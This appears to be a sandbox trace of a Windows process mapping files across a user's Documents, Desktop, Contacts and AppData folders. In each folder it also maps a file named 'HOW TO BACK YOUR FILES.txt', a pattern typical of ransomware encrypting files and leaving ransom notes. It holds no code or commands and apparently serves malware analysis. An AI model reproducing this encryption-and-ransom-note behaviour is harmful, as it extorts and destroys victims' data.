Create Mapping C:\Users\FD1HVy\Documents\My Shapes\_private\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Documents\My Shapes\_private\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-0K PhNNHHadw-4-e.ppt filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-0K PhNNHHadw-4-e.ppt, protection = PAGE_READWRITE, maximum_size = 54864 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\CDDkVk.rtf filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\CDDkVk.rtf, protection = PAGE_READWRITE, maximum_size = 24880 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\jMF5ZBp2kKj.odt filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\jMF5ZBp2kKj.odt, protection = PAGE_READWRITE, maximum_size = 68032 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\TKlqgRD9 Nr6 m.pps filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\TKlqgRD9 Nr6 m.pps, protection = PAGE_READWRITE, maximum_size = 12112 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\bO1p3mfPqljshov1\NHEaUnME.rtf filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\bO1p3mfPqljshov1\NHEaUnME.rtf, protection = PAGE_READWRITE, maximum_size = 50176 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\bO1p3mfPqljshov1\ulXMy6BOucJen4sW.ppt filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\bO1p3mfPqljshov1\ulXMy6BOucJen4sW.ppt, protection = PAGE_READWRITE, maximum_size = 3296 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\bO1p3mfPqljshov1\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\bO1p3mfPqljshov1\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\bO1p3mfPqljshov1\UQBqZ\n-412MXR6-L.pdf filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\bO1p3mfPqljshov1\UQBqZ\n-412MXR6-L.pdf, protection = PAGE_READWRITE, maximum_size = 36448 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\bO1p3mfPqljshov1\UQBqZ\oCaEFK.pps filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\bO1p3mfPqljshov1\UQBqZ\oCaEFK.pps, protection = PAGE_READWRITE, maximum_size = 47600 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\bO1p3mfPqljshov1\UQBqZ\xEqwtSKV7zLSf.pps filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\bO1p3mfPqljshov1\UQBqZ\xEqwtSKV7zLSf.pps, protection = PAGE_READWRITE, maximum_size = 67232 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\bO1p3mfPqljshov1\UQBqZ\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\bO1p3mfPqljshov1\UQBqZ\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\B5abvTlhU7kaxv-9\0ilze62eyGGp8o2xbiCL.pps filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\B5abvTlhU7kaxv-9\0ilze62eyGGp8o2xbiCL.pps, protection = PAGE_READWRITE, maximum_size = 16256 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\B5abvTlhU7kaxv-9\7Zjtx91ByGcvrFKaZy.xls filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\B5abvTlhU7kaxv-9\7Zjtx91ByGcvrFKaZy.xls, protection = PAGE_READWRITE, maximum_size = 99200 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\B5abvTlhU7kaxv-9\Q9S3eEzzxB5rF.ots filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\B5abvTlhU7kaxv-9\Q9S3eEzzxB5rF.ots, protection = PAGE_READWRITE, maximum_size = 12400 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\B5abvTlhU7kaxv-9\SvK-1oG.docx filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\B5abvTlhU7kaxv-9\SvK-1oG.docx, protection = PAGE_READWRITE, maximum_size = 81792 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\B5abvTlhU7kaxv-9\tYLtI.doc filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\B5abvTlhU7kaxv-9\tYLtI.doc, protection = PAGE_READWRITE, maximum_size = 32944 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\B5abvTlhU7kaxv-9\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\B5abvTlhU7kaxv-9\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\8IgFx4zl3bMpZVF MD\ArOyoOdOI6imJTOdUQz.docx filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\8IgFx4zl3bMpZVF MD\ArOyoOdOI6imJTOdUQz.docx, protection = PAGE_READWRITE, maximum_size = 11424 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\8IgFx4zl3bMpZVF MD\FKzNXHAJ9H_X.rtf filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\8IgFx4zl3bMpZVF MD\FKzNXHAJ9H_X.rtf, protection = PAGE_READWRITE, maximum_size = 100720 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\8IgFx4zl3bMpZVF MD\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\8IgFx4zl3bMpZVF MD\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\8IgFx4zl3bMpZVF MD\CV 4F8bU8BkzH0h\I3HSL.pptx filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\8IgFx4zl3bMpZVF MD\CV 4F8bU8BkzH0h\I3HSL.pptx, protection = PAGE_READWRITE, maximum_size = 12656 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\8IgFx4zl3bMpZVF MD\CV 4F8bU8BkzH0h\x7LJ0ZYN8.odt filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\8IgFx4zl3bMpZVF MD\CV 4F8bU8BkzH0h\x7LJ0ZYN8.odt, protection = PAGE_READWRITE, maximum_size = 52976 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\8IgFx4zl3bMpZVF MD\CV 4F8bU8BkzH0h\yjNibne Et76JLFiG7Cj.rtf filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\8IgFx4zl3bMpZVF MD\CV 4F8bU8BkzH0h\yjNibne Et76JLFiG7Cj.rtf, protection = PAGE_READWRITE, maximum_size = 80992 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\8IgFx4zl3bMpZVF MD\CV 4F8bU8BkzH0h\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\8IgFx4zl3bMpZVF MD\CV 4F8bU8BkzH0h\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\iAgvW_.odp filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\iAgvW_.odp, protection = PAGE_READWRITE, maximum_size = 66864 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\JBjCvXV vQ.ppt filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\JBjCvXV vQ.ppt, protection = PAGE_READWRITE, maximum_size = 95344 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\RMDD_1hr.pdf filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\RMDD_1hr.pdf, protection = PAGE_READWRITE, maximum_size = 82656 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\VfPvOBGOXfF2YuC.pptx filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\VfPvOBGOXfF2YuC.pptx, protection = PAGE_READWRITE, maximum_size = 18512 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\yBFSczQSgZ4zH_5p0CuH.ots filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\yBFSczQSgZ4zH_5p0CuH.ots, protection = PAGE_READWRITE, maximum_size = 32384 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\FZyK4S\EBFJF68kMJmPOC6j8o0H.docx filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\FZyK4S\EBFJF68kMJmPOC6j8o0H.docx, protection = PAGE_READWRITE, maximum_size = 24560 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\FZyK4S\rMkT8DHQ-.pdf filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\FZyK4S\rMkT8DHQ-.pdf, protection = PAGE_READWRITE, maximum_size = 46960 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\FZyK4S\TUjgZaL_tfSm-QNcJ8.ods filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\FZyK4S\TUjgZaL_tfSm-QNcJ8.ods, protection = PAGE_READWRITE, maximum_size = 15712 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\FZyK4S\xAZVXzPkRJ6.pptx filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\FZyK4S\xAZVXzPkRJ6.pptx, protection = PAGE_READWRITE, maximum_size = 99440 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\FZyK4S\zOFtTnfv6Q_MW3.rtf filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\FZyK4S\zOFtTnfv6Q_MW3.rtf, protection = PAGE_READWRITE, maximum_size = 54480 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\FZyK4S\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\FZyK4S\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\8TIq-qdhatQQU4\9ehLACIDaiZ9PxP8jeTb.odp filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\8TIq-qdhatQQU4\9ehLACIDaiZ9PxP8jeTb.odp, protection = PAGE_READWRITE, maximum_size = 73968 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\8TIq-qdhatQQU4\jJADNxp7L0AwE.rtf filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\8TIq-qdhatQQU4\jJADNxp7L0AwE.rtf, protection = PAGE_READWRITE, maximum_size = 95312 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\8TIq-qdhatQQU4\UhpMWGFi.pps filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\8TIq-qdhatQQU4\UhpMWGFi.pps, protection = PAGE_READWRITE, maximum_size = 89248 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\8TIq-qdhatQQU4\x _R5.pdf filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\8TIq-qdhatQQU4\x _R5.pdf, protection = PAGE_READWRITE, maximum_size = 1888 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\8TIq-qdhatQQU4\y6ubXI-WBD.pptx filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\8TIq-qdhatQQU4\y6ubXI-WBD.pptx, protection = PAGE_READWRITE, maximum_size = 21808 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\8TIq-qdhatQQU4\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\8TIq-qdhatQQU4\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\3-C44ag206r7-7a-u.jpg filename = C:\Users\FD1HVy\Desktop\3-C44ag206r7-7a-u.jpg, protection = PAGE_READWRITE, maximum_size = 10208 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\3htk4ngR.wav filename = C:\Users\FD1HVy\Desktop\3htk4ngR.wav, protection = PAGE_READWRITE, maximum_size = 31456 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\5j3J4t3qofV.wav filename = C:\Users\FD1HVy\Desktop\5j3J4t3qofV.wav, protection = PAGE_READWRITE, maximum_size = 36512 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\5tCVQ4PvbMxeLAZpu1.png filename = C:\Users\FD1HVy\Desktop\5tCVQ4PvbMxeLAZpu1.png, protection = PAGE_READWRITE, maximum_size = 99840 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\7C4Q.mp4 filename = C:\Users\FD1HVy\Desktop\7C4Q.mp4, protection = PAGE_READWRITE, maximum_size = 45360 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\85suf.pdf filename = C:\Users\FD1HVy\Desktop\85suf.pdf, protection = PAGE_READWRITE, maximum_size = 73264 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\9Nd9jssXw99ThRBTNM7P.png filename = C:\Users\FD1HVy\Desktop\9Nd9jssXw99ThRBTNM7P.png, protection = PAGE_READWRITE, maximum_size = 102032 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\aGhyAFRoo.odp filename = C:\Users\FD1HVy\Desktop\aGhyAFRoo.odp, protection = PAGE_READWRITE, maximum_size = 32848 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\aY_fyEf.bmp filename = C:\Users\FD1HVy\Desktop\aY_fyEf.bmp, protection = PAGE_READWRITE, maximum_size = 22656 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\Dbdfuzst6PZ_.m4a filename = C:\Users\FD1HVy\Desktop\Dbdfuzst6PZ_.m4a, protection = PAGE_READWRITE, maximum_size = 73888 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\dfisfgfVOG.pptx filename = C:\Users\FD1HVy\Desktop\dfisfgfVOG.pptx, protection = PAGE_READWRITE, maximum_size = 5536 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\DzblCW7scjQqRQVoIM.mkv filename = C:\Users\FD1HVy\Desktop\DzblCW7scjQqRQVoIM.mkv, protection = PAGE_READWRITE, maximum_size = 92384 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\h bd3clz1Q5tEHTT.m4a filename = C:\Users\FD1HVy\Desktop\h bd3clz1Q5tEHTT.m4a, protection = PAGE_READWRITE, maximum_size = 98176 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\h t9MdzqmL.wav filename = C:\Users\FD1HVy\Desktop\h t9MdzqmL.wav, protection = PAGE_READWRITE, maximum_size = 90384 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\hzeE96S9vKSRPUEY6BcL.jpg filename = C:\Users\FD1HVy\Desktop\hzeE96S9vKSRPUEY6BcL.jpg, protection = PAGE_READWRITE, maximum_size = 23136 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\IeLgYQ3Ib.m4a filename = C:\Users\FD1HVy\Desktop\IeLgYQ3Ib.m4a, protection = PAGE_READWRITE, maximum_size = 25968 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\LbV09sOi9q6l_9e3.avi filename = C:\Users\FD1HVy\Desktop\LbV09sOi9q6l_9e3.avi, protection = PAGE_READWRITE, maximum_size = 26496 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\n9ZFDGmU0-yzqmqP0W.m4a filename = C:\Users\FD1HVy\Desktop\n9ZFDGmU0-yzqmqP0W.m4a, protection = PAGE_READWRITE, maximum_size = 15136 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\p9t T04.m4a filename = C:\Users\FD1HVy\Desktop\p9t T04.m4a, protection = PAGE_READWRITE, maximum_size = 76992 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\pLl2qR-HR2p6.wav filename = C:\Users\FD1HVy\Desktop\pLl2qR-HR2p6.wav, protection = PAGE_READWRITE, maximum_size = 67072 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\rxUkDp.pdf filename = C:\Users\FD1HVy\Desktop\rxUkDp.pdf, protection = PAGE_READWRITE, maximum_size = 24672 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\S7sxtg.ods filename = C:\Users\FD1HVy\Desktop\S7sxtg.ods, protection = PAGE_READWRITE, maximum_size = 60032 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\sKoLK4y.avi filename = C:\Users\FD1HVy\Desktop\sKoLK4y.avi, protection = PAGE_READWRITE, maximum_size = 13520 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\tLMtnmm.jpg filename = C:\Users\FD1HVy\Desktop\tLMtnmm.jpg, protection = PAGE_READWRITE, maximum_size = 22544 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\TMtiGZYo.mp4 filename = C:\Users\FD1HVy\Desktop\TMtiGZYo.mp4, protection = PAGE_READWRITE, maximum_size = 9856 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\TTdnqfy.mp3 filename = C:\Users\FD1HVy\Desktop\TTdnqfy.mp3, protection = PAGE_READWRITE, maximum_size = 82832 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\uKeH6EOh0T.avi filename = C:\Users\FD1HVy\Desktop\uKeH6EOh0T.avi, protection = PAGE_READWRITE, maximum_size = 65616 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\ut _Q2wK.csv filename = C:\Users\FD1HVy\Desktop\ut _Q2wK.csv, protection = PAGE_READWRITE, maximum_size = 72416 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\VrmBeAnjedws.gif filename = C:\Users\FD1HVy\Desktop\VrmBeAnjedws.gif, protection = PAGE_READWRITE, maximum_size = 71520 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\Wa4HKe.mp3 filename = C:\Users\FD1HVy\Desktop\Wa4HKe.mp3, protection = PAGE_READWRITE, maximum_size = 90304 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\zH1qLFL_L5_F0_C1KIZ.wav filename = C:\Users\FD1HVy\Desktop\zH1qLFL_L5_F0_C1KIZ.wav, protection = PAGE_READWRITE, maximum_size = 96032 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\_IWaP7-XwLltWjdEE.m4a filename = C:\Users\FD1HVy\Desktop\_IWaP7-XwLltWjdEE.m4a, protection = PAGE_READWRITE, maximum_size = 17584 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Desktop\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\cFnKWi\4GlM138d-HV-Uq.m4a filename = C:\Users\FD1HVy\Desktop\cFnKWi\4GlM138d-HV-Uq.m4a, protection = PAGE_READWRITE, maximum_size = 28528 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\cFnKWi\4vxTT7ZgV5J.jpg filename = C:\Users\FD1HVy\Desktop\cFnKWi\4vxTT7ZgV5J.jpg, protection = PAGE_READWRITE, maximum_size = 69632 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\cFnKWi\A6pxU.ots filename = C:\Users\FD1HVy\Desktop\cFnKWi\A6pxU.ots, protection = PAGE_READWRITE, maximum_size = 21888 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\cFnKWi\DnM675.gif filename = C:\Users\FD1HVy\Desktop\cFnKWi\DnM675.gif, protection = PAGE_READWRITE, maximum_size = 32384 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\cFnKWi\ItS9YL1.mp4 filename = C:\Users\FD1HVy\Desktop\cFnKWi\ItS9YL1.mp4, protection = PAGE_READWRITE, maximum_size = 38848 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\cFnKWi\IwTT.png filename = C:\Users\FD1HVy\Desktop\cFnKWi\IwTT.png, protection = PAGE_READWRITE, maximum_size = 37552 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\cFnKWi\q5 t9C04vQ_Z8QALJL.wav filename = C:\Users\FD1HVy\Desktop\cFnKWi\q5 t9C04vQ_Z8QALJL.wav, protection = PAGE_READWRITE, maximum_size = 94496 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\cFnKWi\UeZ-KD32H74.avi filename = C:\Users\FD1HVy\Desktop\cFnKWi\UeZ-KD32H74.avi, protection = PAGE_READWRITE, maximum_size = 41616 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\cFnKWi\x2mPfTMZrBzEwZuAHfp.png filename = C:\Users\FD1HVy\Desktop\cFnKWi\x2mPfTMZrBzEwZuAHfp.png, protection = PAGE_READWRITE, maximum_size = 40736 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\cFnKWi\yeOiJ.swf filename = C:\Users\FD1HVy\Desktop\cFnKWi\yeOiJ.swf, protection = PAGE_READWRITE, maximum_size = 44944 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\cFnKWi\ywdty.avi filename = C:\Users\FD1HVy\Desktop\cFnKWi\ywdty.avi, protection = PAGE_READWRITE, maximum_size = 9456 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\cFnKWi\zqzX.png filename = C:\Users\FD1HVy\Desktop\cFnKWi\zqzX.png, protection = PAGE_READWRITE, maximum_size = 35600 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\cFnKWi\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Desktop\cFnKWi\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Contacts\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Contacts\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\294sz.ods filename = C:\Users\FD1HVy\AppData\Roaming\294sz.ods, protection = PAGE_READWRITE, maximum_size = 93808 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\2kOsnDQ8sk4iEc.odt filename = C:\Users\FD1HVy\AppData\Roaming\2kOsnDQ8sk4iEc.odt, protection = PAGE_READWRITE, maximum_size = 27264 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\66w2QG9-.m4a filename = C:\Users\FD1HVy\AppData\Roaming\66w2QG9-.m4a, protection = PAGE_READWRITE, maximum_size = 76528 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\aHx3nVhQd.bmp filename = C:\Users\FD1HVy\AppData\Roaming\aHx3nVhQd.bmp, protection = PAGE_READWRITE, maximum_size = 5472 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\aQTiHV46oGtw-kWYzdN.jpg filename = C:\Users\FD1HVy\AppData\Roaming\aQTiHV46oGtw-kWYzdN.jpg, protection = PAGE_READWRITE, maximum_size = 77472 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\B1Y4Sf.mkv filename = C:\Users\FD1HVy\AppData\Roaming\B1Y4Sf.mkv, protection = PAGE_READWRITE, maximum_size = 4048 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\CBpBim.docx filename = C:\Users\FD1HVy\AppData\Roaming\CBpBim.docx, protection = PAGE_READWRITE, maximum_size = 14064 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\DBhjSCY L-6dupKa.mkv filename = C:\Users\FD1HVy\AppData\Roaming\DBhjSCY L-6dupKa.mkv, protection = PAGE_READWRITE, maximum_size = 60832 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\dM 1hRjzd1jrBH8W.flv filename = C:\Users\FD1HVy\AppData\Roaming\dM 1hRjzd1jrBH8W.flv, protection = PAGE_READWRITE, maximum_size = 49184 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\DNvzavLWq s3Oc_A UaC.gif filename = C:\Users\FD1HVy\AppData\Roaming\DNvzavLWq s3Oc_A UaC.gif, protection = PAGE_READWRITE, maximum_size = 34112 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\fADueh5_.png filename = C:\Users\FD1HVy\AppData\Roaming\fADueh5_.png, protection = PAGE_READWRITE, maximum_size = 62048 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\g42UGBx1Dj.jpg filename = C:\Users\FD1HVy\AppData\Roaming\g42UGBx1Dj.jpg, protection = PAGE_READWRITE, maximum_size = 36576 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Ir6VFeivjX.pdf filename = C:\Users\FD1HVy\AppData\Roaming\Ir6VFeivjX.pdf, protection = PAGE_READWRITE, maximum_size = 70880 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Jub_eFN7HCcuHfTvv.wav filename = C:\Users\FD1HVy\AppData\Roaming\Jub_eFN7HCcuHfTvv.wav, protection = PAGE_READWRITE, maximum_size = 75472 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\JyRwaozx.bmp filename = C:\Users\FD1HVy\AppData\Roaming\JyRwaozx.bmp, protection = PAGE_READWRITE, maximum_size = 82512 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Lfhe6KRJPHl.ods filename = C:\Users\FD1HVy\AppData\Roaming\Lfhe6KRJPHl.ods, protection = PAGE_READWRITE, maximum_size = 45568 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\LVOHH_6_OObqP.odp filename = C:\Users\FD1HVy\AppData\Roaming\LVOHH_6_OObqP.odp, protection = PAGE_READWRITE, maximum_size = 19872 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\l_m6ACh-WGgkO-6.mkv filename = C:\Users\FD1HVy\AppData\Roaming\l_m6ACh-WGgkO-6.mkv, protection = PAGE_READWRITE, maximum_size = 34352 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\n yYkI2ney_gz_-zE.jpg filename = C:\Users\FD1HVy\AppData\Roaming\n yYkI2ney_gz_-zE.jpg, protection = PAGE_READWRITE, maximum_size = 7520 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\NrEu8Gyj.bmp filename = C:\Users\FD1HVy\AppData\Roaming\NrEu8Gyj.bmp, protection = PAGE_READWRITE, maximum_size = 71104 True 1
Fn
